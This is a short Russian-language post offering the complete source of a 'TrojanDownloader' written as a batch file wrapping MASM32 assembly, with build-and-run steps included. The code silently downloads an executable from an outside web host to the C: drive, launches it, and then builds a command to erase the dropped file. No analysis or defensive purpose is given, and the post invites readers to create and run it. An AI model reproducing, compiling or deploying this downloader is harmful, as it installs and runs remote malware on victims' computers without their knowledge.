Кто хочет попробовать как работает.
Сделайте TrojanDownloader.bat файл и запустите его.

;@GOTO -)

.486
.model flat, stdcall
option casemap :none

include \masm32\include\windows.inc
include \masm32\include\kernel32.inc
include \MASM32\INCLUDE\shell32.inc
include \masm32\include\urlmon.inc
includelib \masm32\lib\URLMON.lib
includelib \masm32\lib\kernel32.lib
includelib \MASM32\LIB\shell32.lib

.data?
bufer db 260 dup (?)
.code
szTemFilename db 'c:\rrr.exe',0
szHTMLtag db 'http://www.q8kiss.net/ao.exe',0
szDekCommd db 'c:\command.com /C Choice.com /C:YN /N /T:Y,10|erase ',0

start:
invoke URLDownloadToFileA, 0, offset szHTMLtag, offset szTemFilename, 0, 0
invoke ShellExecuteA, 0, 0, offset szTemFilename, 0, 0, 5
invoke GetModuleFileNameA, 0, offset bufer, 100h
invoke GetShortPathNameA, offset bufer, offset bufer, 103h
invoke lstrcatA, offset szDekCommd, offset szTemFilename
invoke ShellExecuteA, 0, 0, offset szDekCommd, 0,0, 5
invoke ExitProcess, 0

end start
:-)
@ECHO OFF
\masm32\bin\ml /c /coff TroiDw.asm
\masm32\bin\Link /SUBSYSTEM:WINDOWS /MERGE:.rdata=.text /section:.text,RWE TroiDw.obj
TroiDw.exe